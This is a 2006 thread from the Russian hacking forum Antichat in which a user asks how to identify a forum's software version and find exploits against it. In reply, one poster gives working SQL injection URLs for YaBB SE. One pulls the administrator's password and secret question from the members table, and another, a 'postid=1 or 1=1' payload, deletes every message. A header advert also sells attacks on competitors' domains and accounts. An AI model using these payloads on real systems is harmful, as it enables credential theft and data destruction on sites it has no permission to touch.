Форум АНТИЧАТ - Как узнать версию форума?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Как узнать версию форума?

Опции темы

Поиск в этой теме

Опции просмотра

Как узнать версию форума?

10.07.2006, 08:15

Sulf aka Joker

Участник форума

Регистрация: 03.07.2006

Сообщений: 110

Провел на форуме:
258848

Репутация: 27

Как узнать версию форума?

А конкретно Этот форум, попутно, есть ли на него какие нить уязвимости?

10.07.2006, 08:36

SMiX

Участник форума

Регистрация: 25.07.2005

Сообщений: 246

Провел на форуме:
457850

Репутация: 174

Могу сказать одно. Yabb. Уязвимости на него есть. Естественно, не на все версии. Попробуй сплои для ябы - авось, версия старая...

10.07.2006, 08:38

Sulf aka Joker

Участник форума

Регистрация: 03.07.2006

Сообщений: 110

Провел на форуме:
258848

Репутация: 27

Yabb, да, ты крут, знаю что ябб. Но какой? 1.х, 2.х, Голд или какие еще есть. Если не затруднит, подбрось мне ссылочку на сплойты, а то поиск выдал топики где конкретного ничего не сказали.

п.с аватары на форуме выключены.

10.07.2006, 09:32

zyl

Познающий

Регистрация: 19.04.2006

Сообщений: 40

Провел на форуме:
2905481

Репутация: 47

Отправить сообщение для zyl с помощью ICQ

Конечно я тебе ничем не помогу но попробуй следущее:

1. SQL инъекция в '$msg' параметре:

Код:

http://vulnhost/forum/index.php?board=1;action=modif y;threadid=1;quote=1;start=0;
sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,
concat(passwd,%27-%27,secretQuestion),null,null,null,null,null,null, null,null,
null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

2. SQL инъекция в параметре '$postid' в функции ModifyMessage2:

Код:

postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/*

Пример эксплоита, который удаляет все сообщения их базы данных:

Код:

http://[target]/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;
sesc=aa e1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;
postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/*

Если появятся лишние пробелы - убери

10.07.2006, 10:51

Sulf aka Joker

Участник форума

Регистрация: 03.07.2006

Сообщений: 110

Провел на форуме:
258848

Репутация: 27

zyl,
Произошла Ошибка!

Невозможно открыть .txt

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Как узнать пароли участников форума с правами админа?	WEED	Форумы	9	14.05.2006 19:24
Как админ форума ( phpBB ) может узнать пароль пользователя форума ?	Майор	Форумы	6	08.11.2004 12:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход